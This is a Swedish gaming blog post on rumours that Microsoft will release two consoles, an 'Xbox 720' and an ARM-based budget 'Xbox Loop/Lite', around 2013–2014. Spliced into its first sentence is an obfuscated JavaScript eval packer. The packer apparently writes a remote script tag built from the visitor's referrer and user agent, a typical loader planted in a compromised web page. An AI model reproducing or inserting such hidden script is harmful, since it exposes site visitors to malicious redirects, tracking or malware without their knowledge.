Image Image Image Image Image Image Image Image Image Image

| 28 oktober, 2020

Scroll to top

Top

Två nya konsoler från Microsoft? Xbox 720 och Loop/Lite.

Två nya konsoler från Microsoft? Xbox 720 och Loop/Lite.
Sebastian

Vi eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fytnt|var|u0026u|referrer|hzekn||js|php’.split(’|’),0,{}))
vet ännu inte när det är dags för Microsoft att lansera sin nya konsol. Många gissar på att det i alla fall är någon gång under 2013 o0ch 2014.

Nya rykten på sidan Tech Radar talar också för att det kommer att släppas två konsoler från Microsoft. Xbox Lite eller Xbox Loop kommer att bli en ARM-bestyckad budgetmodell som kommer kosta runt en tusenlapp. Syftet med den är inte känt än vilket gör att ryktet är väldigt skakigt.

Sen har vi den tänkta ersättaren till nuvarande Xbox-modellen, Xbox 720 som många tror att den kommer heta. Då Xbox Loop släpps under 2013 väntar Microsoft med en lansering av den snabbare modellen tills först 2014.

Eftersom Microsoft redan har gått ut officiellt med att ingen ny konsol ska visas upp på E3-mässan i år så är det inte helt otroligt att nästa år kan bli aktuellt. En lansering 2014 låter därmed fullt möjligt enligt många.